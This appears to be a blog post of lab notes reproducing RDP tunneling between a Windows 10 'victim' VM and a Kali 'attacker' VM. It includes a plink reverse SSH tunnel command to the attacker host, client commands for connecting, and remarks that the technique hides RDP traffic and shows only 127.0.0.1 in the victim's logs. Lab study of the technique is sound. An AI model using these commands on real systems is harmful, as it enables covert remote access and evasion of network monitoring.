https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
setup 2 vms both set to "internal network" in oracle virtualbox
1 vm is windows 10
1 vm is kali linux
ensure they can ping eachother
setup in windows 10 vm
- download plink.exe from putty website
setup in kali linux vm
- edit /etc/ssh/sshd_config to allow root ssh (PermitRootLogin yes)
- restart or start ssh server (systemctl start ssh.service, systemctl restart ssh.service)
- check status of ssh to ensure it's running (systemctl status ssh)
steps to perform rdp tunneling
1.) on windows victim box
plink.exe root@kaliLinuxIPAddress -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389
(note: this sets up an ssh tunnel from your windows victim box to your linux attacker box , note kaliLinuxIPAddress is replaced with the IP of your attacker box, and root is replaced with whatever account you want to ssh with ... you should see an ssh connection going from the windows box to the attacker box on port 22)
2.) then on the kali linux box
rdesktop -u VictimAccount 127.0.0.1:12345
or
xfreerdp /u:VictimAccount 127.0.0.1:12345
or
use remmina for RDP and connect to 127.0.0.1:12345 (this is what worked for me best on Windows 10, the others did not appear to be able to support the proper network authentication encryption)
(note: now you should be brought up a remote desktop session to the victim box from your attacker box, the interesting things is that you won't see any rdp traffic , only the already established ssh connection/tunnel on port 22, also on the victim box you won't see any traffic in the logs from the attacker box, you'll only see source ip of 127.0.0.1 on everything, such as in the remote desktop logs)
Showing posts with label remmina. Show all posts
Showing posts with label remmina. Show all posts
Thursday, February 20, 2020
Subscribe to:
Posts (Atom)